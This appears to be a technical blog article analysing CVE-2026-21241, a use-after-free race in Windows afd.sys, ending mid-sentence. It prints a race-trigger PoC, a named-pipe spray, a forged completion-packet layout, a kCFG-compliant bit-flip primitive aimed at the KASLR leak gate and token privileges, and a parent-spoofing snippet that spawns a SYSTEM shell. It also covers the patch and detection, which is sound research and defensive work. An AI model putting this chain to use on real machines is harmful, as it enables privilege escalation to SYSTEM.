If you are here, I assume you have read "Windows Internals You Need To Know Before Kernel Exploitation" and "The Kernel Attack Surface: How Windows Internals Enable Exploitation" already. If you haven't, I recommend you go through them first.
The series has walked two legs of the kernel attack surface so far. The ThrottleStop article walked the physical-memory leg — a signed third-party driver handing out MmMapIoSpace to any caller. The CVE-2024-30088 article walked the virtual-memory leg — a pointer race in ntoskrnl.exe itself, no driver involved. This article walks the third leg: the kernel pool. It is the leg Section 5 of the attack-surface post mapped — use-after-free, reclaim, type confusion — and it is the leg every modern kernel exploit still lives on, because no mitigation stack has yet figured out how to make the allocator refuse to hand freed memory back.
#The setting is what makes this bug interesting. There is no vulnerable driver to load, no IOCTL to reverse engineer, no BYOVD. The bug lives in afd.sys — the kernel half of Winsock, present on every Windows machine, reachable by any user who can call socket(). And the exploitation is a masterclass in what kernel exploitation looks like after HVCI, kCFG, KDP, and KASLR: no shellcode, no hijacked control flow, no token pointer swap — just pool grooming, two legitimate nt! functions abused as callbacks, and a single bit flipped in the process's own token.
#The Kernel Pool as an Attack Surface
In The Kernel Attack Surface, Section 5 described the pool's core vulnerability pattern in four steps: trigger an allocation, trigger the free, spray to reclaim, trigger the use. This bug is that pattern, executed against a stock Microsoft driver. To follow the exploitation, three properties of the modern pool matter:
Allocation buckets. Pool allocations are served from size buckets. On the non-paged pool's low-fragmentation heap (LFH), a request of size S lands in the same bucket as every other request whose rounded size matches. A 0x70-byte request and an 0x80-byte request including its POOL_HEADER are the same allocation to the allocator — which means an attacker who can make 0x70-byte allocations of their own can reclaim a freed 0x70-byte victim. Precisely this size-matching is the entire art of the spray in this exploit.
The randomized pool makes layout probabilistic, not impossible. Since Windows 10 2004, the free list is randomized, so the classic "place allocation A exactly adjacent to allocation B" died. But a use-after-free does not need adjacency — it needs reclamation of the same slot. Spraying thousands of same-sized allocations into the bucket means one of them, with high probability, lands exactly on the freed address. The dangling pointer does the aiming; the spray does the flooding.
A UAF is a write primitive if the use is a write. The question that determines exploitability is never "can we free memory the kernel still points at" — races like that exist in every concurrent driver. The question is what the kernel does with the dangling pointer. If it only reads, the attacker gets an info leak at best. If it calls through the object, the attacker gets control flow. Here, the freed object is an I/O completion structure that the kernel dequeues and dispatches through — which is the best case.
#AFD.sys — What It Is and Why It Matters
The Ancillary Function Driver (afd.sys) is the kernel side of Winsock. Every socket(), connect(), send() in user mode bottoms out in ws2_32.dll issuing DeviceIoControl requests to \Device\Afd. The driver is a historic favorite of exploit writers precisely because of this reachability: there is no ACL between an arbitrary user-mode process and AFD's dispatch table. You do not need to be elevated, you do not need to open a service control manager or load a driver — you need to make one socket API call.
AFD has been walked before. CVE-2023-21768 was a missing ProbeForWrite in afd!AfdNotifyRemoveIoCompletion — a write-what-where primitive that strlcpy3 turned into a full read/write through the I/O Ring. For this article, the relevant surface is newer: the socket state notifications API, added in build 20348 (Server 2022 / Windows 11). It lets a process register a socket (or an entire socket array) against an I/O completion port and receive readiness events — the kernel-side machinery behind efficient socket polling:
// ws2_32.dll — the user-mode entry point.
// Registers one or more sockets against an IOCP and optionally waits for events.
//
// ProcessSocketNotifications() issues IOCTL 0x12127 to \Device\Afd,
// dispatched to afd!AfdNotifySock in the kernel.
typedef struct _SOCK_NOTIFY_REGISTRATION {
SOCKET socket; // target socket
PVOID completionKey; // caller-defined, returned with each event
ULONG eventFilter; // which readiness events to receive
ULONG operation; // SOCK_NOTIFY_OP_ENABLE / REMOVE
ULONG triggerFlags; // LEVEL / EDGE, PERSISTENT / ONESHOT
} SOCK_NOTIFY_REGISTRATION;
DWORD ProcessSocketNotifications(
HANDLE iocp, // completion port to deliver events to
UINT32 registrationCount,
SOCK_NOTIFY_REGISTRATION* registrations,
UINT32 timeout,
ULONG outputEntries,
OVERLAPPED_ENTRY* receivedEntries,
UINT32* receivedCount);Internally, AFD allocates a per-registration notification context — an undocumented structure — and stores it in the socket's kernel endpoint object at endpoint+0x178. Every registered socket has one, for as long as the registration lives. When the socket closes, the context is torn down.
#The Object at the Center: I/O Mini-Completion Packets
To understand what AFD allocates and what goes wrong, you need one piece of kernel machinery that rarely gets explained: the I/O mini-completion packet.
When a completion is posted to an I/O completion port — from user mode via PostQueuedCompletionStatus, or from the kernel via IoSetIoCompletionEx — the kernel does not allocate a full IRP for it. It enqueues a small structure called an _IO_MINI_COMPLETION_PACKET_USER:
// _IO_MINI_COMPLETION_PACKET_USER — Windows 11 x64
// 0x50 bytes. The object the entire exploit pivots through.
struct _IO_MINI_COMPLETION_PACKET_USER
{
struct _LIST_ENTRY ListEntry; //0x00 — queue linkage on the completion port
ULONG PacketType; //0x10 — dispatch selector (see below)
VOID* KeyContext; //0x18 — returned to user as CompletionKey
VOID* ApcContext; //0x20 — returned to user as lpOverlapped
LONG IoStatus; //0x28 — NTSTATUS for the completion
ULONGLONG IoStatusInformation; //0x30 — returned as NumberOfBytes
VOID* MiniPacketCallback(
struct _IO_MINI_COMPLETION_PACKET_USER* arg1,
VOID* arg2); //0x38 — driver-supplied callback
VOID* Context; //0x40 — second argument to the callback
UCHAR Allocated; //0x48 — was this allocated by the kernel?
};The kernel has a default packet it allocates and frees itself. But drivers can supply their own packets — allocate one from the pool, initialize it with IoInitializeMiniCompletionPacket, and enqueue it. This buys the driver two things: it controls the packet's lifetime, and it can attach a callback (MiniPacketCallback) plus a Context that the kernel will invoke when the packet is dequeued.
That callback is the load-bearing feature. When a thread calls GetQueuedCompletionStatus, nt!IoRemoveIoCompletion dequeues the packet and, for the "callback dispatch" packet type, reads ApcContext, KeyContext, IoStatus, and IoStatusInformation and returns them to user mode in an OVERLAPPED_ENTRY. When the packet is freed, nt!IopFreeMiniCompletionPacket checks whether the driver left a callback installed — and if so, calls it.
The contract that comes with this power is the one AFD forgot: the driver must not free a packet that is still enqueued. If it does, the dequeue path operates on freed memory — and the free path's callback dispatch operates on whatever the attacker reclaimed the memory with. The kernel even exports IoCancelMiniCompletionPacket specifically so a driver can safely dequeue-before-free. AFD calls it. The bug is that AFD also has a path that skips it.
#CVE-2026-21241 Overview
| Advisory | MSRC CVE-2026-21241 — "Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability" |
| Class | Use After Free (CWE-416), reached through a race condition |
| CVSS 3.1 | 7.0 High — AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (Important per MSRC) |
| Reported | October 17, 2025, by Souhail Hammou (@Dark_Puzzle); confirmed October 24, 2025 |
| Patched | February 10, 2026 Patch Tuesday — e.g. Windows 11 23H2 fixed in build 22631.6649 (KB5075941), 24H2 in 26100.7840 (KB5077181) |
| Affected | Windows 11 23H2+ and Server 2022/2025. Windows 10 is not listed — the notification API this bug lives in postdates those builds |
| Exploited in the wild | No |
The AC:H in the vector is honest: this is a race, and losing the race is the common case — the crash PoCs hammer the window in tight loops before they win it once. But as we will see, "hard to win once" and "hard to weaponize" are different claims, and the public exploit needed to win it only five times.
#The Vulnerable Code
Two functions, one allocation, one spinlock.
afd!AfdNotifyPostEvents processes completed notifications for a socket's registration. It runs under the endpoint's in-stack queued spinlock, and its decompiled logic — reconstructed from Bad_Jubies' reversing — looks like this:
// afd!AfdNotifyPostEvents — reconstructed pseudocode
// AfdEndpoint = the kernel-side socket object (first argument)
// The notification context for the registration lives at endpoint+0x178
// and is cached into RBX at function entry.
Notification = *(PVOID*)((char*)AfdEndpoint + 0x178); // mov rbx, [rcx+0x178]
KeAcquireInStackQueuedSpinLock(&AfdEndpoint->Lock, &LockHandle);
// ... walk the notification list, process completed events ...
if (!AtDispatchLevel) {
KeReleaseInStackQueuedSpinLock(&LockHandle);
} else {
KeReleaseInStackQueuedSpinLockFromDpcLevel(&LockHandle);
}
// ^^ spinlock released — Notification is now an unguarded raw pointer
if (IoCancelMiniCompletionPacket(*(PVOID*)((char*)Notification + 0x50),
Notification))
{
// The packet was still enqueued; it has now been safely dequeued.
ObfDereferenceObject(FileObject);
if (!AtDispatchLevel) {
KeAcquireInStackQueuedSpinLock(&AfdEndpoint->Lock, &LockHandle);
} else {
KeAcquireInStackQueuedSpinLockAtDpcLevel(&AfdEndpoint->Lock, &LockHandle);
}
// ^^ spinlock re-acquired — Notification (RBX) is still cached and raw
}The structure to internalize: the pointer to the notification object is cached in a register, the spinlock protecting that object's lifetime is dropped, a call is made that dereferences the pointer, and then the lock is taken again as if nothing could have changed. Between the release and the reacquire, the object the pointer points at has no owner. Whether it still exists when the function continues is not AFD's decision — it is every other thread's.
The free lives in afd!AfdNotifyDestroyContext, reached from the socket close path:
// afd!AfdNotifyDestroyContext — reconstructed pseudocode
// Called from AfdCleanupCore during IRP_MJ_CLEANUP (last handle closed),
// and from AfdNotifyPostEvents itself on the normal teardown path.
VOID AfdNotifyDestroyContext(PVOID Endpoint, PNOTIFICATION_OBJ pNotificationObj)
{
// NotifyStatus is an AFD-specific extension field at offset +0x68
// of the notification object. It mirrors the IoStatusInformation value
// that was posted with the completion.
//
// BUG: when the posted event carried IoStatusInformation == 0,
// NotifyStatus == 0, and this condition treats the packet as
// "not enqueued" — so the cancel is skipped entirely.
if (*(UINT16*)((char*)pNotificationObj + 0x68) != 0)
{
// Normal path: dequeue the mini-completion packet before freeing.
if (IoCancelMiniCompletionPacket(
*(PVOID*)((char*)pNotificationObj + 0x50)))
{
ObfDereferenceObject(Endpoint);
}
}
// Reached with the packet still on the completion port queue
// when NotifyStatus was zero:
ObfDereferenceObject(*(PVOID*)((char*)pNotificationObj + 0x50));
ExFreePoolWithTag(pNotificationObj, 0x4e646641); // 'AfdN' — the free
}The notification object itself is a 0x70-byte allocation in the non-paged NX pool, tag AfdN — the first 0x50 bytes are the standard _IO_MINI_COMPLETION_PACKET_USER, and AFD bolts a 0x20-byte extension on the back. That extension includes the NotifyStatus field at +0x68 whose zero-check gates the cancel.
#The Root Cause: Two Views of One Window
The two original writeups describe this bug from two ends, and both are correct. Together they explain not just the UAF but why it is exploitable rather than merely crashy.
The lock view (Bad_Jubies). AfdNotifyPostEvents caches the notification pointer in RBX, releases the endpoint spinlock to call into the completion machinery, and keeps using the cached pointer after reacquiring. Any thread that can free the object inside that window turns the cache into a dangling pointer. The cleanup path is exactly such a thread: closesocket() issues IRP_MJ_CLEANUP on the socket's file object, and AfdCleanupCore — running under the spinlock AFD's other thread just released — calls AfdNotifyDestroyContext and frees the AfdN object mid-flight. When AfdNotifyPostEvents comes back, it dereferences freed memory and eventually hands it to ObfDereferenceObject, which trips the kernel's reference-count checks and bugchecks with REFERENCE_BY_POINTER.
The enqueue view (Souhail Hammou). The deeper defect is the NotifyStatus check in the destroy path. AFD's contract with the completion port is: a notification object that is still enqueued must be cancelled (IoCancelMiniCompletionPacket) before it is freed. The cancel is gated on NotifyStatus != 0 — but NotifyStatus is a mirror of the IoStatusInformation posted with the event, and events legitimately carry IoStatusInformation == 0. When one does, AfdNotifyDestroyContext skips the cancel and frees an object that is still sitting on the I/O completion port's queue. The UAF is not "a pointer outlived its object" — it is "the kernel's queue still holds an entry whose backing memory the driver returned to the pool."
This is why the free does not merely corrupt a private driver structure. The dangling entry belongs to the kernel's completion machinery. The use-after-free executes in nt — in IoRemoveIoCompletion and IopFreeMiniCompletionPacket — against a freed AfdN slot that the attacker has reclaimed. The victim object, the queue, and the dispatch path are all generic kernel infrastructure. AFD just supplies the premature free.
// The bug, compressed to its causal skeleton:
//
// 1. AfdNotifyPostEvents: enqueues the notification object on the IOCP
// with NotifyStatus = IoStatusInformation = 0
// 2. AfdNotifyPostEvents: releases the endpoint spinlock
// 3. cleanup thread: closesocket() → IRP_MJ_CLEANUP
// 4. AfdNotifyDestroyContext: NotifyStatus == 0 → skip the cancel
// 5. AfdNotifyDestroyContext: ExFreePoolWithTag(AfdN) — still enqueued
// 6. AfdNotifyPostEvents: reacquires the spinlock, uses the stale pointer
// 7. GetQueuedCompletionStatus: dequeues the freed entry and dispatches it#Triggering the Bug
Souhail's minimal PoC is worth studying because it removes everything nonessential — no connections, no data, no networking. The trick is in the registration flags:
// Souhail Hammou's minimal crash PoC (abridged)
// https://github.com/SouhailHammou/Windows-Vulnerability-Research
DWORD WINAPI CreateAndNotify(LPVOID Param)
{
while (TRUE)
{
iocp = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
SOCK_NOTIFY_REGISTRATION registration = {0};
registration.socket = sock;
registration.completionKey = (PVOID)0x13371337;
// These flags are the entire trick: they get AFD to enqueue
// notifications on a socket that was never bound or connected.
registration.eventFilter = SOCK_NOTIFY_REGISTER_EVENT_OUT;
registration.operation = SOCK_NOTIFY_OP_REMOVE;
registration.triggerFlags = SOCK_NOTIFY_TRIGGER_LEVEL
| SOCK_NOTIFY_TRIGGER_PERSISTENT;
// Enters the kernel via IOCTL 0x12127 → AfdNotifySock.
// While this call is in flight, the cleanup thread (below) is
// hammering closesocket() against the same socket, sending
// IRP_MJ_CLEANUP into the race window.
ProcessSocketNotifications(iocp, 1, ®istration,
1 /* shortest timeout */, 1, &oEntry, &cntEntry);
closesocket(sock);
CloseHandle(iocp);
}
}
// Issues IRP_MJ_CLEANUP as fast as the scheduler allows
DWORD WINAPI CleanupThread(LPVOID Param)
{
SOCKET* psock = (SOCKET*)Param;
while (TRUE)
closesocket(*psock);
}Two main threads each spawn a cleanup thread and spin in this loop; a third thread can optionally spin on GetQueuedCompletionStatus to widen the dequeue-side half of the race. When the window is finally hit, the kernel operates on freed memory and the system bugchecks — commonly REFERENCE_BY_POINTER when the stale object reaches ObfDereferenceObject, though the observed code varies because the freed slot may already hold unrelated pool data by the time it is touched.
#The Exploitation: From Bugcheck to SYSTEM
The public weaponization of this bug is by jle-k, built on Souhail's crash PoC over a single weekend. It is the cleanest available demonstration of what a modern pool UAF chain looks like, and each stage below is a direct answer to a specific mitigation.
#Stage 0 — Reclaim the Freed Slot with Named Pipes
The notification object is a 0x70-byte AfdN allocation in the non-paged NX pool. To control the use-after-free, the attacker must reclaim that exact slot with controlled data before the kernel's dequeue path touches it.
The reclaim vehicle is the oldest trick in the pool-spraying repertoire — named pipes:
// The spray primitive: an unbuffered pipe write via NtFsControlFile.
//
// FSCTL_PIPE_INTERNAL_WRITE (0x119FF8) writes into the pipe in
// *unbuffered* mode: the write data is NOT copied into the pipe's
// DATA_QUEUE_ENTRY. Instead, the data is allocated as its own pool
// block and the entry's SystemBuffer points at it. The attacker
// therefore controls both the SIZE and the CONTENTS of a pool
// allocation made by npfs.sys on their behalf.
// Size math: a 0x70-byte write allocates a 0x70-byte data block,
// which the pool rounds to 0x80 including the _POOL_HEADER.
// The freed AfdN object is 0x70 bytes → same LFH bucket.
// Same bucket, thousands of attempts → the freed slot is reclaimed.
static void spray_npipes(const void* pattern, size_t pattern_len)
{
// NtFsControlFile(pipeHandle, ..., FSCTL_PIPE_INTERNAL_WRITE,
// (PVOID*)inputPages, pattern_len, NULL, NULL, ...);
// issued against a large array of named pipe handles,
// re-run before every race attempt.
}────────────────────────────────────
|Other| |AfdN| |Other| the freed slot
────────────────────────────────────
~free occurs~
────────────────────────────────────
|Other| |free| |Other| dangling pointer still held
────────────────────────────────────
~spray reclaims chunk~
────────────────────────────────────
|Other| |pipe write| |Other| attacker bytes now occupy
──────────────────────────────────── the AfdN slot
This is the Section 5 feng shui from the attack-surface post, with the named-pipe entry updated for the modern pool: since the data allocations are unbuffered, they are separate allocations with fully controlled size and contents — ideal reclaim bullets. Re-running the spray before every race attempt improves the odds that when the race is won, the reclaimed slot holds the attacker's pattern.
#Stage 1 — Forge a Mini-Completion Packet
The spray pattern is a fake _IO_MINI_COMPLETION_PACKET_USER laid over the freed 0x70 bytes:
// jle-k's spray pattern — the fake packet
// (field offsets refer to _IO_MINI_COMPLETION_PACKET_USER above)
static void fill_pattern(uint8_t* buf, size_t len)
{
memset(buf, 0, len);
PULONGLONG pkt = (PULONGLONG)buf;
// The first 0x10 bytes of the spray overlap the packet's ListEntry
// linkage. Rather than a list entry, this stage parks an RTL_BITMAP
// header here — the kernel never dereferences ListEntry for a
// packet that is dispatched via the callback path.
pkt[0x00/8] = g_spray_bitmap_size; // RTL_BITMAP.SizeOfBitMap
pkt[0x08/8] = g_spray_bitmap_buffer; // RTL_BITMAP.Buffer ← aim
pkt[0x10/8] = 4; // PacketType 4 → callback dispatch
pkt[0x30/8] = 0xCAFECAFECAFECAFE; // sentinel, returned as NumberOfBytes
pkt[0x38/8] = g_spray_callback; // MiniPacketCallback ← the payload
pkt[0x40/8] = g_spray_context; // Context ← second argument
pkt[0x48/8] = 0; // Allocated
}Two fields do the work:
PacketType = 4selects the callback-dispatch branch inIoRemoveIoCompletion. The kernel readsKeyContext(+0x18),ApcContext(+0x20),IoStatus(+0x28), andIoStatusInformation(+0x30) off the fake packet and returns them to user mode in theOVERLAPPED_ENTRY. That last field is the exploit's oracle: the pattern plants0xCAFECAFECAFECAFEat+0x30, so a singleGetQueuedCompletionStatuswhosedwNumberOfBytesequals the sentinel tells user mode the race was won and the fake object was consumed — no kernel crash needed to find out.MiniPacketCallbackat+0x38is the payload. When the fake packet reachesIopFreeMiniCompletionPacket, this pointer is invoked. And the first argument handed to it is the packet itself — a pointer to the attacker's own sprayed bytes.
#Stage 2 — The kCFG-Compliant Call
Here is where the exploit earns its place in this series. The callback dispatch in IopFreeMiniCompletionPacket runs a guard check:
// nt!IopFreeMiniCompletionPacket — reconstructed pseudocode
if (pCompletionCallback != 0)
{
rdx = *(arg + 0x40); // Context — attacker-controlled second argument
if (pCompletionCallback == PspIoMiniPacketCallbackRoutine)
return ObfDereferenceObject(...); // legit internal callers
if (pCompletionCallback == AlpcpLookasidePacketCallbackRoutine)
return AlpcpLookasidePacketCallbackRoutine(...);
if (pCompletionCallback != ExpWorkerFactoryCompletionPacketRoutine)
return _guard_dispatch_icall(pCompletionCallback, rdx);
// ^^ indirect call, kCFG-gated — the hijack point
return ExpWorkerFactoryCompletionPacketRoutine(...);
}Three known internal callbacks get special-cased, and ExpWorkerFactoryCompletionPacketRoutine is explicitly blocked. Everything else goes through _guard_dispatch_icall — Kernel Control Flow Guard. On a system with kCFG active, a hijacked indirect call whose target is not a valid CFG entry bugchecks the machine. The two-decade-old answer to "control the function pointer, control the kernel" is dead here.
The exploit's answer is not to defeat kCFG but to satisfy it. nt!RtlClearAllBits and nt!RtlSetBit are ordinary exported kernel functions — legitimate indirect-call targets, present in the CFG bitmap, invocable through _guard_dispatch_icall without complaint. The attacker simply sets MiniPacketCallback to one of them:
// Two legitimate kernel APIs, called with two attacker-controlled arguments
// (both derived from the reclaimed allocation itself):
void RtlClearAllBits(PRTL_BITMAP Bitmap);
// Bitmap->SizeOfBitmap = pkt[0x00] ← controlled
// Bitmap->Buffer = pkt[0x08] ← controlled
// → zero every bit in ANY kernel address range
void RtlSetBit(PRTL_BITMAP Bitmap, ULONG BitNumber);
// Bitmap = the packet itself (first arg)
// BitNumber = pkt[0x40] (Context) ← controlled
// → set ONE chosen bit at ANY kernel addressThe combined primitive: arbitrary bit-set and arbitrary bit-clear at any kernel address — not an arbitrary write, not a call-oriented primitive, but a bit-level read-modify-write of kernel memory, assembled entirely from functions the kernel considers safe to call.
#Stage 3 — Kill the KASLR Leak Gate (Twice)
A bit-manipulation primitive at arbitrary addresses still needs addresses to aim at. NtQuerySystemInformation(SystemModuleInformation) and the handle-to-kernel-pointer query used to leak kernel addresses freely; that door has been progressively closed — and the exploit has to reopen it, using the primitive itself.
The gate has two layers, and the order of their removal matters.
Layer 1 — the WIL feature flag. nt!ExIsRestrictedCaller — the routine that decides whether a caller gets scrubbed kernel addresses — consults a Windows Internal Libraries feature flag, Feature_RestrictKernelAddressLeaks__private_featureState:
// nt — feature-flag evaluation (reconstructed)
// The flag byte on a stock build reads 0x57 (0101 0111).
if ((featureState & 0x10) == 0) // bit 4 = fast-path marker
return IsEnabledFallback(...); // slow path: re-evaluate
// from the descriptor and
// CACHE the result back
return featureState & 1; // fast path: bit 0 = enabledThe obvious move — zero the byte with RtlClearAllBits — fails, and the failure is instructive: clearing the byte also clears bit 4, so evaluation falls to the slow path, which re-reads the feature's real descriptor, decides the feature should be on, and writes the result back — re-arming the defense on the next instruction. A WIL flag is not a boolean; it is a cache of a slower computation, and caches get repopulated.
The move that works is two stages, two races, two callbacks:
// Stage A — clear everything (0x57 → 0x00)
g_spray_callback = RtlClearAllBits;
g_spray_bitmap_size = 8; // one byte
g_spray_bitmap_buffer = g_FeatureFlag;
g_spray_context = 0;
// Stage B — set bit 4 only (0x00 → 0x10)
g_spray_callback = RtlSetBit;
g_spray_bitmap_size = 8;
g_spray_bitmap_buffer = g_FeatureFlag;
g_spray_context = 4; // BitNumber = bit 4Result: 0x10 — the fast-path marker is set, the enabled bit is clear, ExIsRestrictedCaller returns 0 without ever reaching the fallback that would overwrite the value. The flag now permanently reports "feature disabled" while the descriptor still says otherwise. (jle-k found in practice that this stage proved more reliable when performed before the DACL stage below — the reason was not investigated.)
Layer 2 — SepMediumDaclSd. With the flag out of the way, one gate remains: a global security descriptor whose DACL controls access to the kernel-address-leaking queries for callers below Medium integrity — the restriction added in Windows 10 20H1. nt!SepMediumDaclSd is that security descriptor itself (the object the global pointer nt!SeMediumDaclSd points at), and the kernel consults it on every query. A security descriptor's Control bitmask sits at offset +2:
// Zero the DACL's Control field:
// target = SepMediumDaclSd + 2 (the Control word of the SECURITY_DESCRIPTOR)
// one RtlClearAllBits call, bitmap size 16 → every control bit cleared
// → the descriptor grants the query to everyone
g_spray_callback = RtlClearAllBits;
g_spray_bitmap_size = 16;
g_spray_bitmap_buffer = g_SepMediumDaclSd + 2;After this, NtQuerySystemInformation hands out kernel addresses again — the handle-to-object-pointer query included, which is what the exploit actually needs next:
// Leak the kernel address of our own token:
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &h_token);
ULONGLONG k_token_addr = get_kernel_pointer_by_handle(h_token);
// ^^ SystemHandleInformation query — post-corruption, unscrubbedOne honest caveat from jle-k's writeup: the kernel image base itself was passed as a command-line argument in the public exploit. Locating nt!SepMediumDaclSd and nt!RtlSetBit requires knowing where nt is loaded, and the known side-channel for leaking it on 24H2 needs real hardware. That is a separate gap from the bug — but it means the chain as published carries one address as an assumption.
#Stage 4 — Flip One Bit in the Token
With the token's kernel address in hand, the endgame is the same data-only goal every exploit in this series converges on — reached, this time, without an arbitrary write.
A token's privileges are two bitmasks: Privileges.Present (what the token could have) and Privileges.Enabled (what is currently active). SepPrivilegeCheck tests the requested privilege in both. SeDebugPrivilege is privilege LUID 20 — bit 20 — so the entire privilege escalation is four bit flips across two bitmasks:
// jle-k's token stages — two more races, two more RtlSetBit calls
ULONGLONG priv_present = k_token_addr + TOKEN_PRIV_PRESENT_OFFSET;
ULONGLONG priv_enabled = k_token_addr + TOKEN_PRIV_ENABLED_OFFSET;
// Set bit 20 in Privileges.Present
g_spray_callback = RtlSetBit;
g_spray_bitmap_size = 64;
g_spray_bitmap_buffer = priv_present;
g_spray_context = 20; // SeDebugPrivilege
// Set bit 20 in Privileges.Enabled — identical, aimed at priv_enabledWhy bit flips instead of the classic token-pointer swap the ThrottleStop exploit used? Because the token pointer in _EPROCESS is the kind of high-value field Kernel Data Protection may guard — and the classic swap is the most heavily watched move in the playbook. The Privileges bitmasks inside the token are not protected. KDP pushed the exploit off the pointer and onto the bits — and privilege checks are just bit tests.
#Stage 5 — SYSTEM Shell
SeDebugPrivilege is all a process needs to open any process on the machine, including the SYSTEM ones. From there, parent-process spoofing — spawning a child that inherits a SYSTEM process's token — turns the privilege into a shell without ever writing another kernel byte:
// Open winlogon (SYSTEM) with the freshly-flipped SeDebugPrivilege,
// then spawn a child parented onto it — the child is born SYSTEM.
// (based on xpn's classic snippet)
HANDLE hWinlogon = OpenProcess(PROCESS_ALL_ACCESS, FALSE, winlogon_pid);
UpdateProcThreadAttribute(si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
&hWinlogon, sizeof(HANDLE), NULL, NULL);
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE,
EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
NULL, NULL, (LPSTARTUPINFOA)&si, &pi);
// "Enjoy your new SYSTEM process."#The Cost Accounting
The full chain needs five race wins — flag clear, flag set, DACL clear, Present bit, Enabled bit — each requiring a fresh free, a fresh spray, and a fresh win of a high-AC race. jle-k measured two to twenty minutes per stage in a VM, and every attempt that loses the reclaim is a potential BSOD. The exploit works; it is just expensive. The author's own reflection is worth repeating: converting the bit primitive into a stable read/write primitive via the I/O Ring (the same technique the CVE-2024-30088 article pivoted through) would likely have been more reliable, and would have saved a race. The trade is five coin flips for a clean conscience against the mitigation stack versus two coin flips and a riskier primitive.
#The Patch
The fix is gated behind the servicing flag Feature_447951161 and lands in four functions — AfdNotifyDestroyContext, AfdNotifyPostEvents, AfdCleanupCore, and AfdCloseCore:
AfdNotifyDestroyContextno longer frees. TheExFreePoolWithTagcall is removed from the destroy path (theObfDereferenceObjectcalls remain). The function that runs concurrently with the post-events path — the one reachable through the race — physically cannot return the object to the pool anymore.- The free moves to the last owner.
AfdNotifyPostEventsnow performs the free itself, inside its own spinlock discipline, with the object's lifetime guarded by a reference count that is incremented before the spinlock release and dropped only after the final dereference. As long as the post-events path holds a reference, the cleanup path's dereference cannot make the free happen underneath it.
Binary-diff tooling (AutoPiff) independently tagged the change with exactly the heuristics you would hope to see fire on this class of bug: spinlock_acquisition_added, added_refcount_guard, added_use_after_free_guard.
The shape of the fix is the lesson. Microsoft did not narrow the race window, add a NotifyStatus fixup, or try to make the zero-status case rarer. They made the premature free structurally impossible by giving the notification object a reference-counted lifetime and moving the free to the path that provably holds the last reference. For a lifetime bug, the correct fix is always to fix the lifetime — not to shrink the window in which the lifetime is wrong.
#Why It Bypasses the Mitigation Stack
This exploit is the best article-length answer in the series so far to the question the defense post left open: what does exploitation look like on a machine where the walls actually stand?
| Mitigation | What it enforces | How this exploit routes around it |
|---|---|---|
| HVCI | No new executable kernel memory — no shellcode, no code pages | There is no shellcode anywhere in the chain. Every instruction executed is a legitimate kernel function the attacker merely aimed |
| kCFG | Indirect calls only to valid CFG targets | The hijacked callback is a valid CFG target — RtlClearAllBits/RtlSetBit are ordinary exports. The call passes _guard_dispatch_icall by design, not by bypass |
| KASLR | Kernel addresses hidden from user mode | The exploit does not guess the base — it uses the bit primitive to disable the gate that scrubs the leaks, then reads addresses through the APIs built to provide them |
| KDP | Static kernel data (SSDT, security globals) tamper-protected via hypervisor | Nothing KDP-protected gets written. SepMediumDaclSd, the WIL flag byte, and the token's privilege bitmasks are ordinary writable data — bits 20 of two ULONGs, not the _EPROCESS.Token pointer |
| Randomized pool | Deterministic spraying no longer works | Reclaiming a freed slot does not need determinism — thousands of same-bucket attempts converge probabilistically |
| SMEP / SMAP | Kernel won't run/read user pages | Irrelevant — nothing user-mode-resident is executed or dereferenced by the kernel in this chain |
#Detection
Like every race-triggered chain in this series, the footprint is behavioral and volume-based rather than signature-based. The interesting indicators are the comb patterns — bursts of activity that make no sense individually:
- AFD notification churn from one low-privilege process. The trigger requires tight loops of socket creation,
ProcessSocketNotificationsregistration, andclosesocket()teardown — hundreds of iterations per second from a single process, with no corresponding network activity on any socket. The ETWWinSock-AFDprovider sees the notification object creation/cleanup storm directly. - A named-pipe spray that follows the churn. A burst of
FSCTL_PIPE_INTERNAL_WRITEcalls with fixed-size (0x70-byte) unbuffered writes across thousands of pipe handles, timed immediately after socket cleanup — the reclaim attempt. Pipe writes are normal; thousands of same-sized pipe writes from one process in the seconds around a socket storm are the pattern. - A low-integrity process that suddenly succeeds at
SystemModuleInformation. This is the highest-signal single indicator: a below-Medium-IL process successfully queryingNtQuerySystemInformationfor kernel module addresses meansSepMediumDaclSd(or the WIL flag gatingExIsRestrictedCaller) has been corrupted — there is no legitimate path to that outcome. SeDebugPrivilegewithout a logon lineage. The token'sEnabledbitmask gains bit 20 with no corresponding Event ID 4672 (special privileges assigned), no UAC elevation, no service installation. An unprivileged process that can openwinlogon.exewithPROCESS_ALL_ACCESS— or that spawns a child parented onto it viaPROC_THREAD_ATTRIBUTE_PARENT_PROCESS— is the final stage observed from user mode.- Crash-adjacent retry noise. Before the win, the losses show up as system instability — and on a hardened box, every lost reclaim is a potential
REFERENCE_BY_POINTERbugcheck. A workstation BSODding repeatedly around a user-mode process doing socket work is not a hardware problem.
#Key Takeaways
-
The pool leg is alive because the pool is irreplaceable. Two legs of this series needed something unusual — a malicious driver, or a pointer race in
ntoskrnl. This one needed only a driver that allocates from the pool like every driver does, plus a lifetime bug. The allocator cannot refuse to hand freed memory back; only the discipline of "never free what is still referenced" can prevent what follows, and that discipline is enforced nowhere but in driver code. -
A UAF's value is decided by what the use does. The same free with a read-only use is a crash; with a callback-dispatch use, it is control of the instruction pointer. The exploitation question for any lifetime bug is not "can we reclaim the slot" but "what does the kernel do with the reclaimed bytes" — and here the use ran inside
nt's own completion machinery, which no driver bug should ever get to feed. -
kCFG curated the call, and the call was enough. Kernel CFG did not stop the function-pointer hijack — it stopped the attacker choosing the target freely. Choosing among legitimate exports is still a choice, and
RtlClearAllBits/RtlSetBitturned it into arbitrary bit set/clear. The lesson generalizes: every allowlist defense converts "anything" into "anything on this list" — and the list of kernel functions that corrupt memory given controlled arguments is longer than anyone wants to audit. -
KASLR is bypassed by corrupting the leak gate, not by guessing. The exploit zeroed the
Controlfield of the DACL that decides who gets addresses, and set a single fast-path bit in a feature flag so the kernel's own fallback logic would not undo the change. Note the WIL detail — the naive "zero the flag" attack fails because the flag is a cache the kernel repopulates. A defense that re-arms itself is a defense the attacker must corrupt into a stable state. -
KDP moved the goalpost eight bytes. The classic
